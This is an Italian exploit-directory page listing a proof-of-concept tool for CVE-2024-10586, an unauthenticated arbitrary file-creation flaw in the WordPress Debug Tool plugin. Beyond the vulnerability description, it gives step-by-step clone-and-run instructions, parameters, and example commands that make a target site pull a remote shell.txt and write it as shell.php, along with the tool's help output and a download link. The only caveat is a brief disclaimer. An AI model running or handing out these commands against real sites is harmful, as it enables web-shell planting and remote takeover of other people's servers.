Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-10586-Poc — Exploit di prova di concetto per CVE-2024-10586 che colpisce il plugin WordPress Debug Tool. Automatizza il caricamento arbitrario di file che porta all'esecuzione remota di codice tramite richieste POST non autenticate. | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2024-10586-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2024-10586-poc

CVE-2024-10586-Poc

Exploit di prova di concetto per CVE-2024-10586 che colpisce il plugin WordPress Debug Tool. Automatizza il caricamento arbitrario di file che porta all'esecuzione remota di codice tramite richieste POST non autenticate.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
121 anno faNon ancora revisionato
Condividi

Informazioni sulla Vulnerabilità

Descrizione Il plugin Debug Tool per WordPress è vulnerabile alla creazione arbitraria di file a causa di una mancanza di controllo delle capacità sulla funzione dbt_pull_image() e della mancata validazione del tipo di file in tutte le versioni fino alla 2.2 inclusa.
Ciò consente a utenti non autenticati di creare file arbitrari come file .php che possono essere sfruttati per l'esecuzione di codice remoto.

CVE ID

CVE-2024-10586

Utilizzo dello Script

Prerequisiti

  • Python 3.x installato sul tuo sistema.
  • Installa le dipendenze necessarie: pip install requests

Come Eseguire

  1. Clona il repository da GitHub:
git clone https://github.com/Nxploited/CVE-2024-10586-Poc
cd CVE-2024-10586-Poc
  1. Esegui lo script con il seguente comando: python CVE-2024-10586.py -u -r -p

    Parametri

  • -u, --url: L'URL di base del sito WordPress (es. http://example.com/wordpress).
  • -r, --remote: L'URL del file remoto da utilizzare come sorgente del payload.
  • -p, --path: Opzionale. Il percorso in cui verrà salvata la shell. Predefinito: /opt/lampp/htdocs/wordpress/wp-content/Nxploit.php.

Comando di Esempio

python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php

Esempio di Utilizzo

python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php

usage: CVE-2024-10586.py [-h] -u URL -r REMOTE [-p PATH]

Send a POST request to WordPress admin-ajax.php.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     The base URL of the WordPress site.
  -r REMOTE, --remote REMOTE
                        The remote URL to use in the 'source' parameter.
  -p PATH, --path PATH  The file path to use in the 'missed' parameter. Defaults to '/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php'.

Avvertenza

Questo script è solo per scopi educativi. Usalo in modo responsabile e solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test. Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo strumento.

Scarica lo strumento